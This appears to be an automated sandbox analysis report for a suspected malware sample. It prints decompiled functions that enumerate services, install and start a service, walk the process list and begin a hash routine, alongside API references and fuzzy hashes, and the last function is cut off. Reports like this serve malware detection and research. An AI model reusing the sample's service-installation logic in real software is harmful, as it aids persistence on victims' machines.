Instruction Fuzzy Hash: 46F12234900619EFDF029F65EC84AFE7BB8FF49310F014159E884E72A4E7356865CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003906A0 Relevance: 12.2, APIs: 8, Instructions: 194
serviceCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E003906A0(void* __edi, intOrPtr _a4) {
				int _v8;
				signed char _v12;
				signed long long _v16;
				struct _ENUM_SERVICE_STATUS* _v20;
				signed long long _v24;
				intOrPtr _v28;
				signed long long _v32;
				int _v36;
				int _v40;
				struct _ENUM_SERVICE_STATUS _v76;
				char _v77;
				char _v588;
				void* __esi;
				signed char _t43;
				intOrPtr _t45;
				void* _t46;
				int _t51;
				long _t52;
				intOrPtr _t54;
				signed char _t56;
				void* _t61;
				intOrPtr _t66;
				void* _t67;
				void* _t68;
				intOrPtr _t70;
				signed int _t71;
				intOrPtr _t73;
				struct _ENUM_SERVICE_STATUS* _t75;
				intOrPtr _t79;
				signed int _t80;
				void* _t88;
				int _t90;
				struct _ENUM_SERVICE_STATUS* _t95;
				intOrPtr* _t96;
				void* _t97;
				void* _t100;
				intOrPtr* _t107;
				signed long long _t115;
				long long _t121;

				_t88 = __edi;
				 *0x3ce2a8 =  *0x3ce2a8 -  *0x3c7fe8;
				_v36 = 0;
				_t115 =  *0x3ce1c8 -  *0x3c7fe0;
				_v77 = 0;
				 *0x3ce1c8 = _t115;
				_t67 = OpenSCManagerA(0, 0, 0x80000000);
				_v12 = _t67;
				if(_t67 == 0) {
					_t93 = E0038CF90(__eflags, _t115, 0x3f97, 0x14);
					_t43 = E00390980(_a4, _t115, _t42);
					asm("fsubr qword [0x3c7fc0]");
					_v16 =  *0x3ce3d8 -  *0x3c7fb8;
					asm("fcomp qword [ebp-0xc]");
					asm("fnstsw ax");
					asm("fld1");
					_t121 =  *0x3ce3c0 - st0;
					asm("fxch st0, st1");
					 *0x3ce3c0 = _t121;
					asm("fsubr qword [0x3ce3d8]");
					 *0x3ce3d8 = _t121;
					__eflags = _t43 & 0x00000041;
					if((_t43 & 0x00000041) == 0) {
						_t71 =  *0x3ce26c; // 0xdae
						_t79 =  *0x3ce5b4; // 0x1cd4718b
						_t80 = _t79 + _t71 + 0xe40cc7f6;
						__eflags = _t80;
						 *0x3ce26c = _t80;
					}
					E00396570(0x14, _t93);
				} else {
					_t81 =  &_v40;
					_t51 = EnumServicesStatusA(_t67, 0x30, 3,  &_v76, 0x24,  &_v40,  &_v8,  &_v36);
					_t94 = _t51;
					_t52 = GetLastError();
					if(_t51 == 0 || _t52 == 0xea) {
						_push(_t88);
						_t90 = _v40 + 0x24;
						_t95 = E0039CBC4(_t81, _t90, _t94, _t90);
						_t100 = _t97 + 4;
						_v20 = _t95;
						if(_t95 != 0) {
							EnumServicesStatusA(_t67, 0x30, 3, _t95, _t90,  &_v40,  &_v8,  &_v36);
							_t68 = 0;
							if(_v8 > 0) {
								_t96 = _t95 + 0xc;
								_t107 = _t96;
								do {
									_t61 = E0038CF90(_t107, _t115, 0x255a, 0x10);
									_push( *((intOrPtr*)(_t96 - 8)));
									_push( *((intOrPtr*)(_t96 - 0xc)));
									E0039E0C2( &_v588, 0x1ff, _t61,  *_t96);
									E00396570(0x10, _t61);
									_t100 = _t100 + 0x28;
									E00390980(_a4, _t115,  &_v588);
									_t66 =  *0x3ce0e8; // 0xe89a10bc
									_v28 = _t66;
									asm("fild dword [ebp-0x18]");
									_t68 = _t68 + 1;
									_t96 = _t96 + 0x24;
									_v32 = _t115;
									_v32 =  *0x3ce338 + _v32 -  *0x3c7fdc;
									_t115 =  *0x3ce560 * _v32;
									 *0x3ce560 = _t115;
								} while (_t68 < _v8);
								_t95 = _v20;
							}
							_t75 =  *0x3ce1fc; // 0x80000000
							_v20 = _t75;
							asm("fild dword [ebp-0x10]");
							asm("fsubp st1, st0");
							_v24 =  *0x3ce400;
							_v24 =  *0x3ce344 + _v24;
							_t115 =  *0x3ce1a8 * _v24;
							 *0x3ce1a8 = _t115;
							 *0x3ce1fc =  *0x3ce1fc + 1;
							E0039CB4B(_t95);
							_t67 = _v12;
							 *0x3ce140 = ( *0x3ce140 & 0x0000ffff) - 0x2fe8c243;
						}
						 *0x3ce46c =  *0x3ce46c - 1;
						_t54 =  *0x3ce46c; // 0xd500
						_t73 =  *0x3ce4fc; // 0x94b9
						_t56 = _t73 + _t54 - 0x5a0da30b;
						_v12 = _t56;
						asm("fild dword [ebp-0x8]");
						_v16 = _t115;
						asm("fcomp qword [ebp-0xc]");
						asm("fnstsw ax");
						if((_t56 & 0x00000041) == 0) {
							 *0x3ce0b4 =  *0x3ce4d8 -  *0x3c7fd0 +  *0x3c7fc8;
						}
						CloseServiceHandle(_t67);
					}
				}
				_t45 =  *0x3ce45c; // 0x3519d6c0
				_t70 =  *0x3ce4ac; // 0xea843028
				_t46 = _t45 + _t70;
				 *0x3ce478 =  *0x3ce478 + _t46;
				 *0x3ce45c =  *0x3ce45c - 1;
				return _t46;
			}

0x003906a0
0x003906be
0x003906c4
0x003906d3
0x003906d9
0x003906dd
0x003906e9
0x003906eb
0x003906f0
0x003908bd
0x003908c0
0x003908cb
0x003908d7
0x003908e6
0x003908e9
0x003908f1
0x003908f3
0x003908f5
0x003908f7
0x003908fd
0x00390903
0x00390909
0x0039090c
0x0039090e
0x00390915
0x00390923
0x00390923
0x00390925
0x00390925
0x0039092f
0x003906f6
0x003906fe
0x0039070d
0x00390713
0x00390715
0x0039071d
0x0039072a
0x0039072e
0x00390737
0x00390739
0x0039073c
0x00390741
0x0039075a
0x00390760
0x00390765
0x0039076b
0x0039076b
0x00390770
0x00390777
0x00390782
0x00390783
0x00390796
0x0039079e
0x003907a6
0x003907b0
0x003907b5
0x003907ba
0x003907bd
0x003907c0
0x003907c1
0x003907c4
0x003907d6
0x003907df
0x003907e2
0x003907e8
0x003907ed
0x003907ed
0x003907f6
0x003907fc
0x003907ff
0x00390803
0x00390805
0x00390811
0x0039081a
0x0039081d
0x00390823
0x00390829
0x00390835
0x00390841
0x00390841
0x00390848
0x0039084f
0x00390855
0x00390860
0x00390867
0x0039086b
0x0039086e
0x0039087d
0x00390880
0x00390885
0x00390899
0x00390899
0x003908a0
0x003908a0
0x0039071d
0x00390937
0x0039093c
0x00390942
0x00390944
0x0039094a
0x00390955

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,80000000,00000000), ref: 003906E3
EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,?,00000024,?,?,00000000), ref: 0039070D
GetLastError.KERNEL32 ref: 00390715
_malloc.LIBCMT ref: 00390732
EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,00000000), ref: 0039075A
__snprintf.LIBCMT ref: 00390796
_free.LIBCMT ref: 00390829
CloseServiceHandle.ADVAPI32(00000000), ref: 003908A0

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: EnumServicesStatus$CloseErrorHandleLastManagerOpenService__snprintf_free_malloc
String ID:
API String ID: 3403677689-0
Opcode ID: 83fc569520cfa42eac84cb810cc83408b4b16ce7cb226d43b973f44ed7b70fbd
Instruction ID: a3c3792bcd6e51b5fbe67ecd321efb139225a4f7e5dc46fadf6b30db712676bc
Opcode Fuzzy Hash: 83fc569520cfa42eac84cb810cc83408b4b16ce7cb226d43b973f44ed7b70fbd
Instruction Fuzzy Hash: 09710571900618EBEB06DF90FC89FEE7B7CFB88700F154459E980A62A5DB747964CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0039B350 Relevance: 10.6, APIs: 7, Instructions: 102
serviceCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0039B350(signed int __eax, char* _a4) {
				char _v5;
				intOrPtr _v12;
				void* _v16;
				long long _v24;
				int _t15;
				char* _t16;
				char* _t18;
				short _t25;
				intOrPtr _t29;
				short _t32;
				void* _t35;
				void* _t38;
				long long _t50;

				asm("fucompp");
				asm("fnstsw ax");
				asm("fld1");
				asm("fsubp st1, st0");
				if((__eax & 0x00000044) == 0) {
					 *0x3ce570 = 0xffffac87;
				}
				_v5 = 0;
				_t15 = OpenSCManagerA(0, 0, 2);
				_t35 = _t15;
				if(_t35 != 0) {
					_t16 =  *0x3d04ac; // 0x2d81140
					_t38 = CreateServiceA(_t35, _t16, _t16, 0xf01ff, 0x110, 2, 0, _a4, 0, 0, 0, 0, 0);
					if(_t38 == 0) {
						_t18 =  *0x3d04ac; // 0x2d81140
						_t50 =  *0x3ce188 -  *0x3c7878;
						 *0x3ce278 = _t50;
						_t38 = OpenServiceA(_t35, _t18, 0x10);
						if(_t38 != 0) {
							_t29 =  *0x3ce318; // 0x83ae
							_v12 = 0xdbdbf48d - _t29;
							asm("fild dword [ebp-0x8]");
							_v24 = _t50;
							 *0x3ce050 =  *0x3ce050 + _v24;
							goto L7;
						}
					} else {
						asm("fld1");
						asm("faddp st1, st0");
						_t32 =  *0x3ce36c; // 0x1baf
						_v12 = _t32;
						_v24 =  *0x3ce50c -  *0x3c7884 -  *0x3c7880;
						asm("fild dword [ebp-0x8]");
						_t25 = E0039CABC();
						 *0x3ce36c = _t25;
						_v16 =  &_v5;
						 *0x3d04e0(_t38, 1,  &_v16);
						L7:
						StartServiceA(_t38, 0, 0);
						CloseServiceHandle(_t38);
					}
					_t15 = CloseServiceHandle(_t35);
				}
				return _t15;
			}

0x0039b368
0x0039b36a
0x0039b372
0x0039b374
0x0039b37f
0x0039b386
0x0039b386
0x0039b393
0x0039b397
0x0039b39d
0x0039b3a1
0x0039b3aa
0x0039b3d2
0x0039b3d6
0x0039b436
0x0039b43b
0x0039b445
0x0039b451
0x0039b455
0x0039b457
0x0039b468
0x0039b46b
0x0039b46e
0x0039b47a
0x00000000
0x0039b47a
0x0039b3d8
0x0039b3de
0x0039b3e0
0x0039b3ee
0x0039b3fe
0x0039b407
0x0039b40a
0x0039b410
0x0039b41f
0x0039b425
0x0039b428
0x0039b480
0x0039b485
0x0039b48c
0x0039b48c
0x0039b493
0x0039b499
0x0039b49e

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,?,?,?,?,00383CD6,?), ref: 0039B397
CreateServiceA.ADVAPI32(00000000,02D81140,02D81140,000F01FF,00000110,00000002,00000000,00383CD6,00000000,00000000,00000000,00000000,00000000,02D81058), ref: 0039B3CC
ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?,?,?,?,00383CD6,?), ref: 0039B428
OpenServiceA.ADVAPI32(00000000,02D81140,00000010,?,?,?,00383CD6,?), ref: 0039B44B
StartServiceA.ADVAPI32(00000000,00000000,00000000,?,?,?,00383CD6,?), ref: 0039B485
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00383CD6,?), ref: 0039B48C
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00383CD6,?), ref: 0039B493

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: Service$CloseHandleOpen$ChangeConfig2CreateManagerStart
String ID:
API String ID: 643643595-0
Opcode ID: 46e99f7cf426c338d844532e6e51854bcd40025a829f0f66f0d4b0af85460e7e
Instruction ID: 5262012acb9d435e753be8f93d455e3836a978dc1d2673482d0c88ba8cf55278
Opcode Fuzzy Hash: 46e99f7cf426c338d844532e6e51854bcd40025a829f0f66f0d4b0af85460e7e
Instruction Fuzzy Hash: 9831DC31901205EBD7069FA1FD49FAD7B7CFB85B00F518445EA41E22A4E770A820CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0039A078 Relevance: 9.1, APIs: 6, Instructions: 91
processCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0039A078(void* __edi, void* __eflags, signed long long __fp0) {
				void* _t22;
				intOrPtr _t30;
				void* _t39;
				intOrPtr _t49;
				short _t52;
				intOrPtr _t53;
				void* _t56;
				void* _t59;
				void* _t61;
				void* _t63;
				void* _t66;
				signed long long _t69;
				signed long long _t73;

				_t69 = __fp0;
				_t66 = __eflags;
				_t56 = __edi;
				do {
					_t58 = E0038CF90(_t66, _t69, 0xe8d, 0xc);
					_push(_t61 - 0x11c);
					asm("fsubp st1, st0");
					 *0x3ce4c8 =  *0x3c8054 -  *0x3ce1e0;
					_t73 =  *0x3ce1e0;
					asm("fld1");
					asm("faddp st1, st0");
					 *0x3ce1e0 = _t73;
					E0039E0C2(_t61 - 0x340, 0x1ff, _t16,  *(_t61 - 0x138));
					E00396570(0xc, _t58);
					_t63 = _t63 + 0x24;
					E00390980(_t56, _t73, _t61 - 0x340);
					_t22 = CreateToolhelp32Snapshot(8,  *(_t61 - 0x138));
					_t52 =  *0x3ce108; // 0x5dc4
					_t59 = _t22;
					 *((intOrPtr*)(_t61 - 4)) = _t52;
					 *(_t61 - 0x564) = 0x224;
					asm("fild dword [ebp-0x4]");
					 *(_t61 - 0xc) = _t73;
					_t69 =  *0x3ce420 *  *(_t61 - 0xc);
					 *0x3ce108 = E0039CABC();
					if(Module32First(_t59, _t61 - 0x564) == 0) {
						_t40 = E0038CF90(__eflags, _t69, 0x2885, 9);
						E00390980(_t56, _t69, _t26);
						E00396570(9, _t40);
						_t39 =  *(_t61 - 0x10);
						_t63 = _t63 + 0x10;
					} else {
						E00390980(_t56, _t69, _t61 - 0x444);
					}
					E0038AF70(0xa);
					_t30 =  *0x3ce290; // 0xbbaa
					 *((intOrPtr*)(_t61 - 4)) = _t30;
					asm("fild dword [ebp-0x4]");
					 *0x3ce210 = _t69;
					CloseHandle(_t59);
					_t53 =  *0x3ce1fc; // 0x80000000
					_t49 =  *0x3ce080; // 0xf362bf6c
					 *0x3ce1fc =  *0x3ce1fc + 0xe0884aaa - _t53 - _t49;
					 *0x3ce080 =  *0x3ce080 - 1;
					 *(_t61 - 0x140) = 0x128;
				} while (Process32Next(_t39, _t61 - 0x140) != 0);
				CloseHandle(_t39);
				return 1;
			}

0x0039a078
0x0039a078
0x0039a078
0x0039a080
0x0039a098
0x0039a0a6
0x0039a0ad
0x0039a0af
0x0039a0b5
0x0039a0c1
0x0039a0c5
0x0039a0cd
0x0039a0d3
0x0039a0db
0x0039a0e0
0x0039a0ec
0x0039a0fa
0x0039a100
0x0039a107
0x0039a10c
0x0039a10f
0x0039a119
0x0039a11c
0x0039a125
0x0039a135
0x0039a143
0x0039a164
0x0039a169
0x0039a171
0x0039a176
0x0039a179
0x0039a145
0x0039a14e
0x0039a14e
0x0039a180
0x0039a185
0x0039a18e
0x0039a192
0x0039a195
0x0039a19b
0x0039a1a1
0x0039a1a7
0x0039a1bc
0x0039a1c2
0x0039a1ca
0x0039a1da
0x0039a1e4
0x0039a1f4

APIs

Part of subcall function 0038CF90: _malloc.LIBCMT ref: 0038CFC7

__snprintf.LIBCMT ref: 0039A0D3

Part of subcall function 00396570: _memset.LIBCMT ref: 00396593
Part of subcall function 00396570: _free.LIBCMT ref: 00396599

CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 0039A0FA
Module32First.KERNEL32(00000000,00000224), ref: 0039A13B
CloseHandle.KERNEL32(00000000,0000000A,?,00000000), ref: 0039A19B
Process32Next.KERNEL32(?,00000128), ref: 0039A1D4
CloseHandle.KERNEL32(00000000), ref: 0039A1E4

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: CloseHandle$CreateFirstModule32NextProcess32SnapshotToolhelp32__snprintf_free_malloc_memset
String ID:
API String ID: 1384585931-0
Opcode ID: 925ea66e9b2103b8927b1cda1ea5338e9185e567ba8bd5bd1b383e4e442c0630
Instruction ID: f2d6e6ddee83de57ab4e6be90ddcc294594ab95195e31745488016d42f0505f0
Opcode Fuzzy Hash: 925ea66e9b2103b8927b1cda1ea5338e9185e567ba8bd5bd1b383e4e442c0630
Instruction Fuzzy Hash: 1E319E71A012149FDB16AF55EC89FA9777CFB88300F004585F509D6264DB706A50CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003BE3DC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E003BE3DC(void* __edi, char* __esi) {
				short _v8;
				void* _t24;

				_t24 = __edi;
				if(__esi == 0 ||  *__esi == 0 || E0039EBA0(__esi, ?str?) == 0) {
					if(GetLocaleInfoW( *(_t24 + 0x1c), 0x20001004,  &_v8, 2) != 0) {
						if(_v8 != 0) {
							goto L5;
						} else {
							return GetACP();
						}
					} else {
						goto L8;
					}
				} else {
					if(E0039EBA0(__esi, ?str?) != 0) {
						_v8 = E0039E198(__esi);
						goto L5;
					} else {
						if(GetLocaleInfoW( *(__edi + 0x1c), 0x2000000b,  &_v8, 2) == 0) {
							L8:
							return 0;
						} else {
							L5:
							return _v8;
						}
					}
				}
			}

0x003be3dc
0x003be3e4
0x003be44c
0x003be456
0x00000000
0x003be458
0x003be45f
0x003be45f
0x00000000
0x00000000
0x00000000
0x003be3fc
0x003be40b
0x003be431
0x00000000
0x003be40d
0x003be423
0x003be44e
0x003be451
0x003be425
0x003be425
0x003be429
0x003be429
0x003be423
0x003be40b

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,003BEA45,?,003B6635,?,000000BC,?), ref: 003BE41B
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,003BEA45,?,003B6635,?,000000BC,?), ref: 003BE444
GetACP.KERNEL32(?,?,003BEA45,?,003B6635,?,000000BC,?), ref: 003BE458

Strings

ACP, xrefs: 003BE3EB
OCP, xrefs: 003BE3FC

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 62c4cb990fa3faa31c7bd0bb3b0eb323d9b868295a9f124d53c6126611caffdb
Instruction ID: ece4fdd3802d03284b71e57afa39437a0e033a4f36803676591bcb0c71b74650
Opcode Fuzzy Hash: 62c4cb990fa3faa31c7bd0bb3b0eb323d9b868295a9f124d53c6126611caffdb
Instruction Fuzzy Hash: 6A018431A0560ABAEB33DB59AC16FDA77ECAB4035CF508069F602E5480EB60EF419755

Uniqueness

Uniqueness Score: -1.00%

Function 0039EC30 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0039EC30(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x3ce7f0; // 0xbe7ff07e
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x3d1428 = _t6;
				 *0x3d1424 = _t22;
				 *0x3d1420 = _t25;
				 *0x3d141c = _t21;
				 *0x3d1418 = _t27;
				 *0x3d1414 = _t26;
				 *0x3d1440 = ss;
				 *0x3d1434 = cs;
				 *0x3d1410 = ds;
				 *0x3d140c = es;
				 *0x3d1408 = fs;
				 *0x3d1404 = gs;
				asm("pushfd");
				_pop( *0x3d1438);
				 *0x3d142c =  *_t31;
				 *0x3d1430 = _v0;
				 *0x3d143c =  &_a4;
				 *0x3d1378 = 0x10001;
				_t11 =  *0x3d1430; // 0x0
				 *0x3d132c = _t11;
				 *0x3d1320 = 0xc0000409;
				 *0x3d1324 = 1;
				_t12 =  *0x3ce7f0; // 0xbe7ff07e
				_v812 = _t12;
				_t13 =  *0x3ce7f4; // 0x41800f81
				_v808 = _t13;
				 *0x3d1370 = IsDebuggerPresent();
				_push(1);
				E0039EC28(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x3c9dec);
				if( *0x3d1370 == 0) {
					_push(1);
					E0039EC28(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0039ec30
0x0039ec30
0x0039ec30
0x0039ec30
0x0039ec30
0x0039ec30
0x0039ec30
0x0039ec36
0x0039ec38
0x0039ec38
0x003afe84
0x003afe89
0x003afe8f
0x003afe95
0x003afe9b
0x003afea1
0x003afea7
0x003afeae
0x003afeb5
0x003afebc
0x003afec3
0x003afeca
0x003afed1
0x003afed2
0x003afedb
0x003afee3
0x003afeeb
0x003afef6
0x003aff00
0x003aff05
0x003aff0a
0x003aff14
0x003aff1e
0x003aff23
0x003aff29
0x003aff2e
0x003aff3a
0x003aff3f
0x003aff41
0x003aff49
0x003aff54
0x003aff61
0x003aff63
0x003aff65
0x003aff6a
0x003aff7e

APIs

IsDebuggerPresent.KERNEL32 ref: 003AFF34
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003AFF49
UnhandledExceptionFilter.KERNEL32(003C9DEC), ref: 003AFF54
GetCurrentProcess.KERNEL32(C0000409), ref: 003AFF70
TerminateProcess.KERNEL32(00000000), ref: 003AFF77

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: fb17d5155c9168e32b8c5d5fef2ce3ecfa03a65ad6d3ee48acb4049dbe6f28e0
Instruction ID: 23656d76ad694f52cfdf9af15675c29e39cfa27d532e71cbb92dcb41d49cd66f
Opcode Fuzzy Hash: fb17d5155c9168e32b8c5d5fef2ce3ecfa03a65ad6d3ee48acb4049dbe6f28e0
Instruction Fuzzy Hash: 7F21B379902204EFD743EFA6FD48A847BBCFB09345F94941BE40887361E7B06A858F55

Uniqueness

Uniqueness Score: -1.00%

Function 00393070 Relevance: 5.2, Strings: 3, Instructions: 1419
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E00393070(intOrPtr __ecx, signed char __fp0, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long long _v20;
				signed char _v24;
				signed char _v28;
				intOrPtr _v32;
				signed int _v40;
				signed int _t482;
				signed char _t485;
				signed char _t486;
				signed int _t491;
				signed char _t492;
				signed int _t499;
				signed int _t501;
				signed int _t503;
				signed int _t508;
				signed int _t515;
				signed int _t520;
				signed char _t525;
				intOrPtr _t530;
				signed char _t535;
				signed char _t536;
				intOrPtr _t539;
				signed char _t540;
				signed int _t549;
				signed int _t551;
				signed char _t553;
				intOrPtr _t559;
				signed char _t560;
				intOrPtr _t566;
				signed char _t569;
				intOrPtr _t570;
				signed char _t573;
				signed int _t579;
				signed char _t582;
				signed int _t591;
				intOrPtr _t594;
				signed char _t596;
				signed int _t597;
				intOrPtr _t598;
				signed int _t599;
				intOrPtr _t600;
				signed int _t602;
				intOrPtr _t612;
				signed char _t614;
				signed char _t615;
				signed int _t617;
				signed int _t626;
				signed char _t629;
				signed int _t630;
				signed int _t632;
				signed char _t637;
				signed int _t640;
				signed char _t642;
				signed int _t645;
				intOrPtr _t648;
				signed int _t650;
				intOrPtr _t657;
				signed int _t658;
				signed char _t663;
				signed int _t670;
				signed char _t671;
				signed char _t672;
				signed int _t673;
				signed char _t678;
				intOrPtr _t684;
				intOrPtr _t685;
				signed char _t686;
				intOrPtr _t687;
				intOrPtr _t690;
				intOrPtr _t693;
				signed char _t696;
				signed char _t699;
				short _t701;
				signed int _t702;
				signed int _t710;
				signed int _t712;
				signed int _t718;
				signed int _t728;
				signed int _t731;
				signed int _t740;
				signed int _t742;
				signed int _t747;
				intOrPtr _t748;
				signed int _t751;
				signed int _t753;
				signed int _t762;
				signed int _t764;
				intOrPtr _t775;
				intOrPtr _t777;
				signed int _t783;
				signed int _t785;
				signed int _t787;
				signed int _t789;
				signed int _t790;
				signed int _t792;
				signed int _t803;
				signed int _t805;
				signed int _t806;
				signed int _t808;
				short _t810;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t820;
				signed int _t828;
				signed int _t839;
				void* _t844;
				signed int _t845;
				signed int _t846;
				signed int _t854;
				signed int _t855;
				void* _t859;
				signed int _t860;
				signed int _t865;
				intOrPtr _t867;
				intOrPtr _t868;
				signed int _t871;
				signed int _t872;
				signed char _t873;
				signed char _t879;
				signed int _t880;
				signed int _t882;
				signed int _t884;
				signed int _t894;
				signed char _t898;
				signed short _t899;
				signed int _t900;
				intOrPtr _t907;
				signed char _t914;
				intOrPtr _t923;
				signed int _t931;
				intOrPtr _t943;
				intOrPtr _t946;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed char _t989;
				signed int _t1004;
				long long _t1006;
				signed int _t1013;
				intOrPtr _t1026;
				signed int _t1029;
				intOrPtr _t1030;
				intOrPtr _t1040;
				intOrPtr _t1052;
				signed short _t1053;
				signed int _t1054;
				signed int _t1058;
				signed int _t1060;
				void* _t1061;
				signed char _t1068;
				signed int _t1088;
				intOrPtr _t1091;
				signed int _t1099;
				signed int _t1100;
				signed char _t1101;
				intOrPtr _t1102;
				signed int _t1105;
				signed int _t1109;
				intOrPtr _t1113;
				signed int _t1129;
				signed int _t1140;
				signed int _t1142;
				signed int _t1144;
				signed int _t1151;
				signed int _t1153;
				signed int _t1155;
				signed char _t1156;
				signed int _t1162;
				signed int _t1164;
				void* _t1166;
				intOrPtr _t1167;
				signed int _t1173;
				signed int _t1175;
				signed int _t1177;
				signed int _t1179;
				signed char _t1180;
				intOrPtr* _t1181;
				signed char _t1215;
				signed char _t1218;
				signed char _t1230;
				signed char _t1232;
				signed long long _t1236;
				signed long long _t1243;
				long long _t1250;
				signed int _t1256;
				signed long long _t1265;
				signed int _t1299;
				intOrPtr _t1302;
				signed int _t1309;
				signed int _t1318;
				signed int _t1320;
				signed int _t1322;
				signed int _t1326;
				signed int _t1327;
				signed char _t1330;
				signed int _t1335;
				signed int _t1336;
				signed int _t1345;
				signed int _t1349;
				signed int _t1356;
				signed int _t1363;
				signed int _t1365;
				signed long long _t1367;
				signed int _t1369;
				signed char _t1371;
				long long _t1381;
				intOrPtr _t1386;
				signed int _t1390;
				signed int _t1394;

				_t482 =  *(__ecx + 0x10);
				_t900 =  *(__ecx + 0x14);
				_t1181 = _a4;
				_t1105 =  *(__ecx + 0xc);
				_v16 = _t482;
				_v32 = __ecx;
				_t789 =  *0x3ce31c; // 0xd3ba
				_v8 = _t900;
				_a4 = _t789;
				asm("rol ebx, 0x7");
				asm("fild dword [ebp+0x8]");
				_v12 = _t1105;
				_t710 = ( !_t1105 & _t900 | _t482 & _t1105) +  *((intOrPtr*)(__ecx + 8)) +  *_t1181 - 0x28955b88 + _t1105;
				_v28 = __fp0;
				_t1215 =  *0x3ce50c;
				_t485 =  *0x3ce550; // 0xa046b428
				asm("fsubr qword [ebp-0x18]");
				_a4 = _t485;
				_v28 = _t1215;
